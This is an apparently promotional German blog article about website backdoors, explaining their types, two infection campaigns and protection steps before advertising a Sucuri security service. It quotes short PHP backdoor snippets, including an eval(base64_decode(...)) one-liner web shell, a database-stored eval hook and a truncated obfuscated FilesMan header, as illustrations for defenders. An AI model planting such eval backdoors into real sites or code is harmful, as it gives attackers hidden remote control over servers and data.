(Update) Cyberkriminelle greifen Websites mit immer raffinierteren Methoden an, automatisierte Angriffe finden täglich statt. Bot-Netze durchsuchen das Netz nach Seiten mit bekannten Schwachstellen und nutzen diese sofort aus. Diese „Bad Bots“ verursachen inzwischen knapp ein Viertel des Internet-Traffics. Jeder Website-Betreiber kann betroffen sein – Privatpersonen genauso wie kleine, mittlere und große Unternehmen.

Auf den kompromittierten Internetauftritten installieren die Hacker häufig sogenannte Backdoors. Mit diesen lassen sie sich eine Hintertür offen und können zu späteren Zeitpunkten erneut zugreifen. Laut „2019 Website Threat Research Report“ der Sicherheitsexperten von Sucuri enthielten 47 Prozent der untersuchten und infizierten Websites eine oder mehrere Backdoors. Erfahren Sie jetzt mehr über Backdoors, wie Sie Ihre Website schützen und im Fall einer Infektion professionell reinigen lassen können!

Was ist eine Backdoor?

Eine Backdoor (dt. Hintertür) ist eine Art Malware, die einem Angreifer nach einer Website-Infizierung weiterhin den unbefugten Fernzugriff ermöglicht. Es handelt sich um einen alternativen Zugangsweg, der die beschränkten Zugriffsrechte umgeht. Wird auf einer Website eine Schwachstelle gefunden, können Schadcode übertragen und eine oder mehrere Backdoors installiert werden.

Diese Hintertüren überstehen meist Website-Updates und auch aktualisierte Passwörter bieten keinen Schutz. Es gibt Backdoors in diversen Programmiersprachen, wobei PHP am häufigsten zum Einsatz kommt. Backdoors zählen zu den gefährlichsten Arten einer Website-Infizierung, da sie Angreifern die volle Kontrolle ermöglichen.

Arten von Backdoors

Backdoors arbeiten im Hintergrund, sie sind getarnt und je nach Komplexität unterschiedlich schwer zu finden. Es gibt verschiedene Typen.

Komplexe Backdoors

$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = "SQL"
$default_charset = "Windows-1251";
$protectionoffer = "viagra";
preg_replace("/.*/e","x65x76x61x6C.. hundreds more lines..

Beispiel für eine komplexe Hintertür

Abbildung 1 zeigt die „FilesMan-Backdoor“, der umfangreiche Codeblock kann auch von weniger erfahrenen Anwendern gefunden werden. FilesMan kann sich in PHP-Websites einnisten, dazu gehören Content-Management-Systeme (CMS) wie WordPress, Joomla und Drupal. Von den kompromittierten Internetseiten stehlen die Angreifer meist die Kundendaten, inklusive Kreditkarteninformationen.

Große Auswahl an günstigen Domain-Endungen – schon ab 0,08 € /Monat
Jetzt Domain-Check starten

Einfache Backdoors

eval (base64_decode($_Post["php"]));
Beispiel für einfache Hintertüren

Der Code in Abbildung 2 führt beliebigen Code in einer PHP-Anfrage aus. Der Einzeiler wird leicht übersehen.

Backdoors für Content-Management-Systeme (CMS)

return @eval(get_option('blogopt1'));
Die Backdoor ist in der Datenbank versteckt.

Hacker entwickeln auch Hintertüren speziell für Content-Management-Systeme. WordPress ist das mit Abstand meistgenutzte CMS und wird von Cyberkriminellen gezielt angegriffen. Der in Abbildung 3 dargestellte Code ist in der WordPress-Datenbank in der Tabelle wp-options versteckt und entsprechend schwer zu finden.

Warum sind Backdoors so schwer zu finden?

Cyberkriminelle entwickeln ständig neue Malware und Backdoors; ohne Know-how sind die Hintertüren kaum zu finden.

  • Backdoors müssen nirgendwo auf der Website verlinkt sein, was das Aufspüren erschwert.
  • Sie tarnen sich als harmloser Code und können mit einem Passwort geschützt und verschlüsselt sein.
  • Als Speicherort kommt ein beliebiges Verzeichnis auf dem Webserver oder ein Eintrag in die Datenbank infrage.

Beispiel 1: Die Malware WP-VCD richtet eine Backdoor auf WordPress-Websites ein

2019 haben die Sicherheitsexperten von Sucuri die Malware WP-VCD von mehr als 5.000 Websites entfernt. Diese verbreitet sich unter anderem über manipulierte WordPress-Themes und Plug-ins. Wenn Sie solch ein Theme oder Plug-in aus dem Netz herunterladen und installieren, fügt sich der Schadcode allen gefundenen Themes hinzu. Die Folgen:

  • Angreifer monetisieren den Angriff, indem die Malware Ihre Beiträge und Seiten um unerwünschte Werbung ergänzt.
  • Für umfassende Zugriffsrechte erstellt der Schadcode neue Admin-User.
  • Spam-Links können hinzugefügt werden, die Nutzer auf Spam-Websites weiterleiten und den Diebstahl sensibler Daten zum Ziel haben.
  • WP-VCD hinterlässt eine Backdoor, die den späteren Zugriff ermöglicht.

Beispiel 2: Cyberkriminelle verbreiten eine gefährliche Backdoor als Google Chrome Update

Abbildung - fake_chrome_update_for-Backdoor

Das Fake-Update für Google Chrome installiert auf dem Computer eine Backdoor.

Anfang 2020 konnten Hacker diverse WordPress-Websites aus unterschiedlichen Branchen kompromittieren. Sie fügten JavaScript in die gehackten Seiten ein, das Besucher auf eine Phishing-Website weiterleitet. Diese Website fordert die Nutzer zum Installieren eines wichtigen Sicherheitsupdates für Google Chrome auf. Die heruntergeladene Datei installiert eine Backdoor, die den Fernzugriff der infizierten Computer ermöglicht. Hacker können einen Keylogger einrichten und Zugangsdaten zu diversen Online-Diensten abgreifen. Bis März 2020 hatten das Update bereits mehr als 2.000 Personen heruntergeladen.

Backdoors – selbst entfernen vs. entfernen lassen

Die Beseitigung von Schadcode erfordert entsprechendes Know-how und bedeutet einen hohen Zeitaufwand. Für Website-Betreiber ohne Hintergrundwissen ist die Aufgabe kaum zu bewältigen. Das Problem: Teilweise installiert sich die Malware automatisch neu, wenn Sie bei der Bereinigung nur eine einzige Datei übersehen. Wurde die Infizierung spät erkannt, können auch die Backups betroffen sein, die Backdoor lässt sich dann auf diesem Weg nicht beseitigen.

Beauftragen Sie stattdessen besser Sicherheitsexperten mit der Bereinigung. Die Spezialisten reagieren innerhalb weniger Stunden und entfernen die Bedrohungen zuverlässig. Auf diesem Weg vermeiden Sie, dass eine Datei übersehen wird und sich das Virus automatisch neu installieren kann.

Am besten jedoch schützen Sie Ihre Website proaktiv!

Wie kann ich meine Website vor Backdoors schützen?

Es gibt zahlreiche Wege, über die Ihre Website mit Malware infiziert werden kann und in der Folge eine oder mehrere Backdoors enthält. Die wichtigsten Schritte, die Sie unternehmen sollten, sind:

  • Updates installieren: Ein Hauptproblem ist veraltete Software. Nutzen Sie ein CMS wie WordPress, Joomla oder Magento, müssen Sie Updates für die Core-Dateien und verwendeten Erweiterungen grundsätzlich zeitnah installieren. Die Updates schließen bekannt gewordene Sicherheitslücken. Wer die Komponenten seiner Website nicht aktualisiert, riskiert, Opfer eines Hackerangriffs zu werden. Löschen Sie nicht genutzte Templates und Plug-ins.
  • Starke Passwörter: Kommen Angreifer in den Besitz der Zugangsdaten, haben sie leichtes Spiel. Zum Beispiel können sie versuchen, das Admin-Passwort per Bruteforce-Angriff zu knacken. Starke Passwörter sind Pflicht.
  • Unsichere Konfigurationen: Laut Sucuri liefen 2019 rund 54 Prozent der untersuchten WordPress-Installationen mit PHP 5.x und nur 45 Prozent mit einer aktuellen Version von PHP 7.

Wie schütze ich meine Website proaktiv?

Mit einer Sicherheitslösung wie Sucuri Website Security schützen Sie Ihren Internetauftritt proaktiv vor den Gefahren im Netz. Dank täglicher Malware-Scans wird eine Infizierung frühzeitig erkannt und Sie erhalten eine Benachrichtigung.

Wenn Sie die Bereinigung beauftragen, machen sich die Sicherheitsexperten innerhalb von zwölf Stunden an die Arbeit. In eiligeren Fällen können Sie die Express-Soforthilfe beantragen, dann beginnen die Reinigungsarbeiten innerhalb von 30 Minuten.

Ab dem Tarif Sucuri Deluxe agiert die Web Application Firewall (WAF) als zusätzlicher Schutzwall und blockiert diverse Zugriffsversuche. Für mehr Sicherheit und schnellere Ladezeiten ist ein Content Delivery Network (CDN) im Einsatz. Sucuri Website Security bietet umfassenden Schutz vor Malware, Backdoors und anderen Gefahren aus dem Netz. Wählen Sie jetzt den Tarif passend zu Ihrem Bedarf aus und schützen Sie Ihre Websites!

Erfahren Sie mehr über die Möglichkeiten von Sucuri in unserem kostenlosen E-Book: Sucuri in der Praxis – Tipps für Professionals.

 

Titelmotiv: Photo by moren hsu on Unsplash

Wolf-Dieter Fiege

Große Auswahl an günstigen Domain-Endungen – schon ab 0,08 € /Monat
Jetzt Domain-Check starten